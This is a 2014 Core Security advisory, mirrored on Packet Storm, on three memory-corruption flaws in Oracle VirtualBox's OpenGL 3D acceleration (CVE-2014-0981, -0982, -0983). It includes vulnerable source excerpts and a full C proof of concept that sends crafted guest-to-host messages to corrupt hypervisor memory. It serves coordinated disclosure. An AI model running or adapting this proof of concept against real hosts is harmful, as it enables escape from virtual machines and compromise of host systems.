Lucene search

K
packetstormCore Security TechnologiesPACKETSTORM:125660
HistoryMar 11, 2014 - 12:00 a.m.

Oracle VirtualBox 3D Acceleration Memory Corruption

2014-03-1100:00:00
Core Security Technologies
packetstormsecurity.com
48

0.007 Low

EPSS

Percentile

77.9%

`Core Security - Corelabs Advisory  
http://corelabs.coresecurity.com/  
  
Oracle VirtualBox 3D Acceleration Multiple Memory Corruption Vulnerabilities  
  
  
  
1. *Advisory Information*  
  
Title: Oracle VirtualBox 3D Acceleration Multiple Memory Corruption  
Vulnerabilities  
Advisory ID: CORE-2014-0002  
Advisory URL:  
http://www.coresecurity.com/content/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities  
Date published: 2014-03-11  
Date of last update: 2014-03-11  
Vendors contacted: Oracle  
Release mode: User release  
  
  
  
2. *Vulnerability Information*  
  
Class: Improper Validation of Array Index [CWE-129], Improper Validation  
of Array Index [CWE-129], Improper Validation of Array Index [CWE-129]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2014-0981, CVE-2014-0982, CVE-2014-0983  
  
  
  
3. *Vulnerability Description*  
  
VirtualBox is a general-purpose full virtualizer for x86 hardware,  
targeted at server, desktop and embedded use.  
  
VirtualBox provides -among many other features- 3D Acceleration for  
guest machines  
through its Guest Additions. This feature allows guest machines to use  
the host machine's  
GPU to render 3D graphics based on then OpenGL or Direct3D APIs.  
  
Multiple memory corruption vulnerabilities have been found in the code  
that implements  
3D Acceleration for OpenGL graphics in Oracle VirtualBox.  
These vulnerabilities could allow an attacker who is already running  
code within  
a Guest OS to escape from the virtual machine and execute arbitrary code  
on the Host OS.  
  
  
4. *Vulnerable packages*  
  
. Oracle VirtualBox v4.2.20 and earlier.  
. Oracle VirtualBox v4.3.6 and earlier.  
. Other versions may be affected too but they were no checked.  
  
5. *Non-vulnerable packages*  
  
. Oracle VirtualBox v4.3.8.  
  
6. *Credits*  
  
This vulnerability was discovered and researched by Francisco Falcon from  
Core Exploit Writers Team. The publication of this advisory was coordinated  
by Andres Blanco from Core Advisories Team.  
  
  
  
7. *Technical Description / Proof of Concept Code*  
  
VirtualBox makes use of the *Chromium*[1] open-source library  
(not to be confused with the open-source web browser) in order to  
provide 3D Acceleration for OpenGL graphics.  
  
Chromium provides remote rendering of OpenGL graphics through a  
client/server model, in which  
a client (i.e. an OpenGL application) delegates the rendering to the  
server, which has access  
to 3D-capable hardware.  
  
When 3D Acceleration is enabled in VirtualBox, OpenGL apps running  
within a Guest OS  
(acting as Chromium clients) will send rendering commands to the  
Chromium server, which is  
running in the context of the hypervisor in the Host OS.  
  
The code that handles OpenGL rendering commands on the Host side is  
prone to multiple memory  
corruption vulnerabilities, as described below.  
  
  
7.1. *VirtualBox crNetRecvReadback Memory Corruption Vulnerability*  
  
[CVE-2014-0981] The first vulnerability is caused by a *design flaw* in  
Chromium. The Chromium server makes use  
of "*network pointers*". As defined in Chromium's documentation,  
'"Network pointers are  
simply memory addresses that reside on another machine.[...] The  
networking layer will then  
take care of writing the payload data to the specified address."'[2]  
  
So the Chromium's server code, which runs in the context of the  
VirtualBox hypervisor  
in the Host OS, provides a write-what-where memory corruption primitive  
*by design*, which  
can be exploited to corrupt arbitrary memory addresses with arbitrary  
data in the hypervisor process  
from within a virtual machine.  
  
This is the code of the vulnerable function [file  
'src/VBox/GuestHost/OpenGL/util/net.c'], which can  
be reached by sending a 'CR_MESSAGE_READBACK' message to the  
'VBoxSharedCrOpenGL' service:  
  
  
/-----  
/**  
* Called by the main receive function when we get a CR_MESSAGE_READBACK  
* message. Used to implement glGet*() functions.  
*/  
static void  
crNetRecvReadback( CRMessageReadback *rb, unsigned int len )  
{  
/* minus the header, the destination pointer,  
* *and* the implicit writeback pointer at the head. */  
  
int payload_len = len - sizeof( *rb );  
int *writeback;  
void *dest_ptr;  
crMemcpy( &writeback, &(rb->writeback_ptr), sizeof( writeback ) );  
crMemcpy( &dest_ptr, &(rb->readback_ptr), sizeof( dest_ptr ) );  
  
(*writeback)--;  
crMemcpy( dest_ptr, ((char *)rb) + sizeof(*rb), payload_len );  
}  
  
  
-----/  
  
Note that 'rb' points to a 'CRMessageReadback' structure, which is fully  
controlled by the  
application running inside a VM that is sending OpenGL rendering  
commands to the Host side.  
The 'len' parameter is also fully controlled from the Guest side, so  
it's possible to:  
  
1. decrement the value stored at any memory address within the  
address space of the hypervisor.  
2. write any data to any memory address within the address space of  
the hypervisor.  
  
7.2. *VirtualBox crNetRecvWriteback Memory Corruption Vulnerability*  
  
[CVE-2014-0982] The second vulnerability is closely related to the first  
one, and it's also caused by Chromium's  
"*network pointers*".  
  
This is the code of the vulnerable function [file  
'src/VBox/GuestHost/OpenGL/util/net.c'], which can  
be reached by sending a 'CR_MESSAGE_WRITEBACK' message to the  
'VBoxSharedCrOpenGL' service:  
  
  
/-----  
/**  
* Called by the main receive function when we get a CR_MESSAGE_WRITEBACK  
* message. Writeback is used to implement glGet*() functions.  
*/  
static void  
crNetRecvWriteback( CRMessageWriteback *wb )  
{  
int *writeback;  
crMemcpy( &writeback, &(wb->writeback_ptr), sizeof( writeback ) );  
(*writeback)--;  
}  
  
-----/  
  
Note that 'rb' points to a 'CRMessageWriteback' structure, which is  
fully controlled by the  
application running inside a VM that is sending OpenGL rendering  
commands to the Host side, so it's possible to  
decrement the value stored at any memory address within the address  
space of the hypervisor.  
  
  
7.3. *VirtualBox crServerDispatchVertexAttrib4NubARB Memory Corruption  
Vulnerability*  
  
[CVE-2014-0983] When an OpenGL application running inside a VM sends  
rendering commands (in the form of opcodes + data for those opcodes)  
through  
a 'CR_MESSAGE_OPCODES' message, the Chromium server will handle them in  
the 'crUnpack' function.  
The code for the 'crUnpack' function is automatically generated by the  
Python script located  
at 'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py'.  
  
This function is basically a big switch statement dispatching different  
functions according to the opcode being processed:  
  
  
/-----  
void crUnpack( const void *data, const void *opcodes,  
unsigned int num_opcodes, SPUDispatchTable *table )  
{  
[...]  
unpack_opcodes = (const unsigned char *)opcodes;  
cr_unpackData = (const unsigned char *)data;  
  
for (i = 0 ; i < num_opcodes ; i++)  
{  
/*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/  
switch( *unpack_opcodes )  
{  
case CR_ALPHAFUNC_OPCODE: crUnpackAlphaFunc(); break;  
case CR_ARRAYELEMENT_OPCODE: crUnpackArrayElement(); break;  
case CR_BEGIN_OPCODE: crUnpackBegin(); break;  
[...]  
  
-----/  
  
When the opcode being processed is 'CR_VERTEXATTRIB4NUBARB_OPCODE'  
('0xEA'),  
the function to be invoked is 'crUnpackVertexAttrib4NubARB':  
  
  
/-----  
[...]  
case CR_VERTEXATTRIB4NUBARB_OPCODE: crUnpackVertexAttrib4NubARB();  
break;  
[...]  
  
-----/  
  
The 'crUnpackVertexAttrib4NubARB' function reads 5 values from the  
opcode data sent by the Chromium client,  
and just invokes 'cr_unpackDispatch.VertexAttrib4NubARB' with those 5  
values as arguments:  
  
  
/-----  
static void crUnpackVertexAttrib4NubARB(void)  
{  
GLuint index = READ_DATA( 0, GLuint );  
GLubyte x = READ_DATA( 4, GLubyte );  
GLubyte y = READ_DATA( 5, GLubyte );  
GLubyte z = READ_DATA( 6, GLubyte );  
GLubyte w = READ_DATA( 7, GLubyte );  
cr_unpackDispatch.VertexAttrib4NubARB( index, x, y, z, w );  
INCR_DATA_PTR( 8 );  
}  
  
-----/  
  
'VertexAttrib4NubARB' is a function pointer in a dispatch table, and  
points to the function  
'crServerDispatchVertexAttrib4NubARB', whose code is generated by the  
Python script located at  
'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py':  
  
  
/-----  
void SERVER_DISPATCH_APIENTRY crServerDispatchVertexAttrib4NubARB(  
GLuint index, GLubyte x, GLubyte y, GLubyte z, GLubyte w )  
{  
cr_server.head_spu->dispatch_table.VertexAttrib4NubARB( index, x, y,  
z, w );  
cr_server.current.c.vertexAttrib.ub4[index] = cr_unpackData;  
}  
  
-----/  
  
Note that the 'index' parameter, which is a 4-byte integer coming from  
an untrusted source (the opcode data  
sent by the Chromium client from the VM), is used as an index within the  
'cr_server.current.c.vertexAttrib.ub4'  
array in order to write 'cr_unpackData' (which is a pointer to the  
attacker-controlled opcode data), without  
validating that the index is within the bounds of the array.  
This issue can be leveraged to corrupt arbitrary memory with a pointer  
to attacker-controlled data.  
  
Also note that *the same vulnerability affects several functions* whose  
code is generated by the  
'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py'  
Python script:  
  
  
/-----  
Opcode CR_VERTEXATTRIB1DARB_OPCODE [0xDE] -> function  
crServerDispatchVertexAttrib1dARB  
Opcode CR_VERTEXATTRIB1FARB_OPCODE [0xDF] -> function  
crServerDispatchVertexAttrib1fARB  
Opcode CR_VERTEXATTRIB1SARB_OPCODE [0xE0] -> function  
crServerDispatchVertexAttrib1sARB  
Opcode CR_VERTEXATTRIB2DARB_OPCODE [0xE1] -> function  
crServerDispatchVertexAttrib2dARB  
Opcode CR_VERTEXATTRIB2FARB_OPCODE [0xE2] -> function  
crServerDispatchVertexAttrib2fARB  
Opcode CR_VERTEXATTRIB2SARB_OPCODE [0xE3] -> function  
crServerDispatchVertexAttrib2sARB  
Opcode CR_VERTEXATTRIB3DARB_OPCODE [0xE4] -> function  
crServerDispatchVertexAttrib3dARB  
Opcode CR_VERTEXATTRIB3FARB_OPCODE [0xE5] -> function  
crServerDispatchVertexAttrib3fARB  
Opcode CR_VERTEXATTRIB3SARB_OPCODE [0xE6] -> function  
crServerDispatchVertexAttrib3sARB  
Opcode CR_VERTEXATTRIB4NUBARB_OPCODE [0xEA] -> function  
crServerDispatchVertexAttrib4NubARB  
Opcode CR_VERTEXATTRIB4DARB_OPCODE [0xEF] -> function  
crServerDispatchVertexAttrib4dARB  
Opcode CR_VERTEXATTRIB4FARB_OPCODE [0xF0] -> function  
crServerDispatchVertexAttrib4fARB  
Opcode CR_VERTEXATTRIB4SARB_OPCODE [0xF2] -> function  
crServerDispatchVertexAttrib4sARB  
  
-----/  
  
  
7.4. *Proof of Concept*  
  
  
/-----  
#include "stdafx.h"  
#include <windows.h>  
#include "vboxguest2.h"  
#include "vboxguest.h"  
#include "err.h"  
#include "vboxcropenglsvc.h"  
#include "cr_protocol.h"  
  
#define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest"  
  
  
HANDLE open_device(){  
HANDLE hDevice = CreateFile(VBOXGUEST_DEVICE_NAME,  
GENERIC_READ | GENERIC_WRITE,  
FILE_SHARE_READ | FILE_SHARE_WRITE,  
NULL,  
OPEN_EXISTING,  
FILE_ATTRIBUTE_NORMAL,  
NULL);  
  
if (hDevice == INVALID_HANDLE_VALUE){  
printf("[-] Could not open device %s .\n", VBOXGUEST_DEVICE_NAME);  
exit(EXIT_FAILURE);  
}  
printf("[+] Handle to %s: 0x%X\n", VBOXGUEST_DEVICE_NAME, hDevice);  
return hDevice;  
  
  
}  
  
  
uint32_t do_connect(HANDLE hDevice){  
VBoxGuestHGCMConnectInfo info;  
DWORD cbReturned = 0;  
BOOL rc;  
  
memset(&info, 0, sizeof(info));  
info.Loc.type = VMMDevHGCMLoc_LocalHost_Existing;  
strcpy(info.Loc.u.host.achName, "VBoxSharedCrOpenGL");  
  
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CONNECT, &info,  
sizeof(info), &info, sizeof(info), &cbReturned, NULL);  
if (!rc){  
printf("ERROR: DeviceIoControl failed in function do_connect()!  
LastError: %d\n", GetLastError());  
exit(EXIT_FAILURE);  
}  
  
if (info.result == VINF_SUCCESS){  
printf("HGCM connect was successful: client id =0x%x\n",  
info.u32ClientID);  
}  
else{  
//If 3D Acceleration is disabled, info.result value will be -2900.  
printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration  
enabled??)\n", info.result);  
exit(EXIT_FAILURE);  
}  
return info.u32ClientID;  
}  
  
  
void do_disconnect(HANDLE hDevice, uint32_t u32ClientID){  
BOOL rc;  
VBoxGuestHGCMDisconnectInfo info;  
DWORD cbReturned = 0;  
  
memset(&info, 0, sizeof(info));  
info.u32ClientID = u32ClientID;  
printf("Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\n");  
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_DISCONNECT,  
&info, sizeof(info), &info, sizeof(info), &cbReturned, NULL);  
if (!rc){  
printf("ERROR: DeviceIoControl failed in function  
do_disconnect()! LastError: %d\n", GetLastError());  
exit(EXIT_FAILURE);  
}  
  
if (info.result == VINF_SUCCESS){  
printf("HGCM disconnect was successful.\n");  
}  
else{  
printf("[-] HGCM disconnect failed. Result: %d\n", info.result);  
exit(EXIT_FAILURE);  
}  
  
}  
  
  
void set_version(HANDLE hDevice, uint32_t u32ClientID){  
CRVBOXHGCMSETVERSION parms;  
DWORD cbReturned = 0;  
BOOL rc;  
  
memset(&parms, 0, sizeof(parms));  
parms.hdr.result = VERR_WRONG_ORDER;  
parms.hdr.u32ClientID = u32ClientID;  
parms.hdr.u32Function = SHCRGL_GUEST_FN_SET_VERSION;  
parms.hdr.cParms = SHCRGL_CPARMS_SET_VERSION;  
  
parms.vMajor.type = VMMDevHGCMParmType_32bit;  
parms.vMajor.u.value32 = CR_PROTOCOL_VERSION_MAJOR;  
parms.vMinor.type = VMMDevHGCMParmType_32bit;  
parms.vMinor.u.value32 = CR_PROTOCOL_VERSION_MINOR;  
  
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,  
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);  
  
if (!rc){  
printf("ERROR: DeviceIoControl failed in function set_version()!  
LastError: %d\n", GetLastError());  
exit(EXIT_FAILURE);  
}  
  
if (parms.hdr.result == VINF_SUCCESS){  
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);  
}  
else{  
printf("Host didn't accept our version.\n");  
exit(EXIT_FAILURE);  
}  
}  
  
  
void set_pid(HANDLE hDevice, uint32_t u32ClientID){  
CRVBOXHGCMSETPID parms;  
DWORD cbReturned = 0;  
BOOL rc;  
  
memset(&parms, 0, sizeof(parms));  
parms.hdr.result = VERR_WRONG_ORDER;  
parms.hdr.u32ClientID = u32ClientID;  
parms.hdr.u32Function = SHCRGL_GUEST_FN_SET_PID;  
parms.hdr.cParms = SHCRGL_CPARMS_SET_PID;  
  
parms.u64PID.type = VMMDevHGCMParmType_64bit;  
parms.u64PID.u.value64 = GetCurrentProcessId();  
  
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,  
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);  
  
if (!rc){  
printf("ERROR: DeviceIoControl failed in function set_pid()!  
LastError: %d\n", GetLastError());  
exit(EXIT_FAILURE);  
}  
  
if (parms.hdr.result == VINF_SUCCESS){  
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);  
}  
else{  
printf("Host didn't like our PID %d\n", GetCurrentProcessId());  
exit(EXIT_FAILURE);  
}  
  
}  
  
  
/* Triggers the vulnerability in the crNetRecvReadback function. */  
void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){  
CRVBOXHGCMINJECT parms;  
DWORD cbReturned = 0;  
BOOL rc;  
char mybuf[1024];  
CRMessageReadback msg;  
  
memset(&msg, 0, sizeof(msg));  
msg.header.type = CR_MESSAGE_READBACK;  
msg.header.conn_id = 0x8899;  
  
  
//This address will be decremented by 1  
*((DWORD *)&msg.writeback_ptr.ptrSize) = 0x88888888;  
//Destination address for the memcpy  
*((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999;  
  
memcpy(&mybuf, &msg, sizeof(msg));  
strcpy(mybuf + sizeof(msg), "Hi hypervisor!");  
  
memset(&parms, 0, sizeof(parms));  
parms.hdr.result = VERR_WRONG_ORDER;  
parms.hdr.u32ClientID = u32ClientID;  
parms.hdr.u32Function = SHCRGL_GUEST_FN_INJECT;  
parms.hdr.cParms = SHCRGL_CPARMS_INJECT;  
  
parms.u32ClientID.type = VMMDevHGCMParmType_32bit;  
parms.u32ClientID.u.value32 = u32ClientID;  
  
parms.pBuffer.type = VMMDevHGCMParmType_LinAddr_In;  
parms.pBuffer.u.Pointer.size = sizeof(mybuf); //size for the  
memcpy: sizeof(mybuf) - 0x18  
parms.pBuffer.u.Pointer.u.linearAddr = (uintptr_t) mybuf;  
  
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,  
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);  
  
if (!rc){  
printf("ERROR: DeviceIoControl failed in function  
trigger_message_readback()!. LastError: %d\n", GetLastError());  
exit(EXIT_FAILURE);  
}  
  
if (parms.hdr.result == VINF_SUCCESS){  
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);  
}  
else{  
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);  
exit(EXIT_FAILURE);  
}  
}  
  
  
/* Triggers the vulnerability in the crNetRecvWriteback function. */  
void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){  
CRVBOXHGCMINJECT parms;  
DWORD cbReturned = 0;  
BOOL rc;  
char mybuf[512];  
CRMessage msg;  
  
memset(&mybuf, 0, sizeof(mybuf));  
  
memset(&msg, 0, sizeof(msg));  
msg.writeback.header.type = CR_MESSAGE_WRITEBACK;  
msg.writeback.header.conn_id = 0x8899;  
//This address will be decremented by 1  
*((DWORD *)msg.writeback.writeback_ptr.ptrSize) = 0xAABBCCDD;  
  
memcpy(&mybuf, &msg, sizeof(msg));  
strcpy(mybuf + sizeof(msg), "dummy");  
  
memset(&parms, 0, sizeof(parms));  
parms.hdr.result = VERR_WRONG_ORDER;  
parms.hdr.u32ClientID = u32ClientID;  
parms.hdr.u32Function = SHCRGL_GUEST_FN_INJECT;  
parms.hdr.cParms = SHCRGL_CPARMS_INJECT;  
  
parms.u32ClientID.type = VMMDevHGCMParmType_32bit;  
parms.u32ClientID.u.value32 = u32ClientID;  
  
parms.pBuffer.type = VMMDevHGCMParmType_LinAddr_In;  
parms.pBuffer.u.Pointer.size = sizeof(mybuf);  
parms.pBuffer.u.Pointer.u.linearAddr = (uintptr_t) mybuf;  
  
  
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,  
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);  
  
if (!rc){  
printf("ERROR: DeviceIoControl failed in function  
trigger_message_writeback()! LastError: %d\n", GetLastError());  
exit(EXIT_FAILURE);  
}  
  
if (parms.hdr.result == VINF_SUCCESS){  
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);  
}  
else{  
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);  
exit(EXIT_FAILURE);  
}  
  
}  
  
  
/* Triggers the vulnerability in the crServerDispatchVertexAttrib4NubARB  
function. */  
void trigger_opcode_0xea(HANDLE hDevice, uint32_t u32ClientID){  
CRVBOXHGCMINJECT parms;  
char mybuf[0x10f0];  
DWORD cbReturned = 0;  
BOOL rc;  
  
unsigned char opcodes[] = {0xFF, 0xea, 0x02, 0xf7};  
DWORD opcode_data[] =  
{0x08, //Advance 8 bytes  
after executing opcode 0xF7, subopcode 0x30  
0x30, //Subopcode for opcode 0xF7  
0x331, //Argument for opcode 0x02  
0xFFFCFA4B, //This is the  
negative index used to trigger the memory corruption  
0x41414141}; //Junk  
  
CRMessageOpcodes msg_opcodes;  
  
memset(&mybuf, 0, sizeof(mybuf));  
  
memset(&msg_opcodes, 0, sizeof(msg_opcodes));  
msg_opcodes.header.conn_id = 0x8899;  
msg_opcodes.header.type = CR_MESSAGE_OPCODES;  
msg_opcodes.numOpcodes = sizeof(opcodes);  
  
char *offset = (char *)&mybuf;  
memcpy(offset, &msg_opcodes, sizeof(msg_opcodes));  
offset += sizeof(msg_opcodes);  
  
/*----- Opcodes -----*/  
memcpy(offset, &opcodes, sizeof(opcodes));  
offset += sizeof(opcodes);  
  
/*----- data for the opcodes -----*/  
memcpy(offset, &opcode_data, sizeof(opcode_data));  
offset += sizeof(opcode_data);  
  
  
memset(&parms, 0, sizeof(parms));  
parms.hdr.result = 0;  
parms.hdr.u32ClientID = u32ClientID;  
parms.hdr.u32Function = SHCRGL_GUEST_FN_INJECT;  
parms.hdr.cParms = SHCRGL_CPARMS_INJECT;  
  
parms.u32ClientID.type = VMMDevHGCMParmType_32bit;  
parms.u32ClientID.u.value32 = u32ClientID;  
  
parms.pBuffer.type = VMMDevHGCMParmType_LinAddr_In;  
parms.pBuffer.u.Pointer.size = sizeof(mybuf);  
parms.pBuffer.u.Pointer.u.linearAddr = (uintptr_t) mybuf;  
  
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CALL, &parms,  
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);  
  
if (!rc){  
printf("ERROR: DeviceIoControl failed in function  
trigger_opcode_0xea()! LastError: %d\n", GetLastError());  
exit(EXIT_FAILURE);  
}  
  
if (parms.hdr.result == VINF_SUCCESS){  
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);  
}  
else{  
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);  
exit(EXIT_FAILURE);  
}  
  
}  
  
  
void poc(int option){  
HANDLE hDevice;  
uint32_t u32ClientID;  
  
/* Connect to the VBoxSharedCrOpenGL service */  
hDevice = open_device();  
u32ClientID = do_connect(hDevice);  
  
/* Set version and PID */  
set_version(hDevice, u32ClientID);  
set_pid(hDevice, u32ClientID);  
  
switch (option){  
case 1:  
printf("[1] triggering the first bug...\n");  
trigger_message_readback(hDevice, u32ClientID);  
break;  
case 2:  
printf("[2] triggering the second bug...\n");  
trigger_message_writeback(hDevice, u32ClientID);  
break;  
case 3:  
printf("[3] triggering the third bug...\n");  
trigger_opcode_0xea(hDevice, u32ClientID);  
break;  
default:  
printf("[!] Unknown option %d.\n", option);  
}  
  
/* Disconnect from the VBoxSharedCrOpenGL service */  
do_disconnect(hDevice, u32ClientID);  
CloseHandle(hDevice);  
}  
  
  
  
  
int main(int argc, char* argv[])  
{  
if (argc < 2){  
printf("Usage: %s <option number>\n\n", argv[0]);  
printf("* Option 1: trigger the vulnerability in the  
crNetRecvReadback function.\n");  
printf("* Option 2: trigger the vulnerability in the  
crNetRecvWriteback function.\n");  
printf("* Option 3: trigger the vulnerability in the  
crServerDispatchVertexAttrib4NubARB function.\n");  
exit(1);  
}  
poc(atoi(argv[1]));  
}  
  
-----/  
  
  
8. *Report Timeline*  
. 2014-02-11:  
Core Security Technologies notifies the VirtualBox team of the  
vulnerability.  
Publication date is set for March 4th, 2014.  
  
  
. 2014-02-12:  
  
Vendor acknowledges the receipt of the information. Vendor asks to  
coordinate  
the release for April 15, 2014 which is the earliest possible date for  
publishing  
this issue from Oracle.  
  
  
. 2014-02-12:  
  
Core schedules the advisory publication for April 15, 2014 and asks  
for regular status reports.  
  
  
. 2014-03-04:  
  
First release date missed.  
  
  
. 2014-03-07:  
  
Vendor releases fixes of some affected versions [3][4].  
  
  
. 2014-03-07:  
  
Core notifies that, given that some patches were disclosed,  
the advisory will we released as user release ASAP.  
  
  
. 2014-03-07:  
  
Vendor asks for delaying the advisory publication given that  
some versions are still vulnerable.  
  
  
. 2014-03-10:  
  
Core notifies that the advisory is going to be published because  
once the fixes have been made public the vulnerability is public as well.  
  
  
. 2014-03-10:  
  
Vendor notifies that they will not include credit to Core researchers  
given that the advisory is being published before a fix is available to  
all affected versions.  
  
  
. 2014-03-11:  
  
Advisory CORE-2014-0002 published as user release.  
  
  
  
9. *References*  
  
[1] http://chromium.sourceforge.net/  
[2] http://chromium.sourceforge.net/doc/howitworks.html  
[3] https://www.virtualbox.org/changeset/50441/vbox  
[4] https://www.virtualbox.org/changeset/50437/vbox  
  
  
10. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating  
the future needs and requirements for information security technologies.  
We conduct our research in several important areas of computer security  
including system vulnerabilities, cyber attack planning and simulation,  
source code auditing, and cryptography. Our results include problem  
formalization, identification of vulnerabilities, novel solutions and  
prototypes for new technologies. CoreLabs regularly publishes security  
advisories, technical papers, project information and shared software  
tools for public use at:  
http://corelabs.coresecurity.com.  
  
  
  
11. *About Core Security Technologies*  
  
  
Core Security Technologies enables organizations to get ahead of threats  
with security test and measurement solutions that continuously identify  
and demonstrate real-world exposures to their most critical assets. Our  
customers can gain real visibility into their security standing, real  
validation of their security controls, and real metrics to more  
effectively secure their organizations.  
  
  
  
Core Security's software solutions build on over a decade of trusted  
research and leading-edge threat expertise from the company's Security  
Consulting Services, CoreLabs and Engineering groups. Core Security  
Technologies can be reached at +1 (617) 399-6980 or on the Web at:  
http://www.coresecurity.com.  
  
  
  
12. *Disclaimer*  
  
  
The contents of this advisory are copyright  
(c) 2014 Core Security Technologies and (c) 2014 CoreLabs,  
and are licensed under a Creative Commons  
Attribution Non-Commercial Share-Alike 3.0 (United States) License:  
http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
  
13. *PGP/GPG Keys*  
  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories  
team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
  
  
`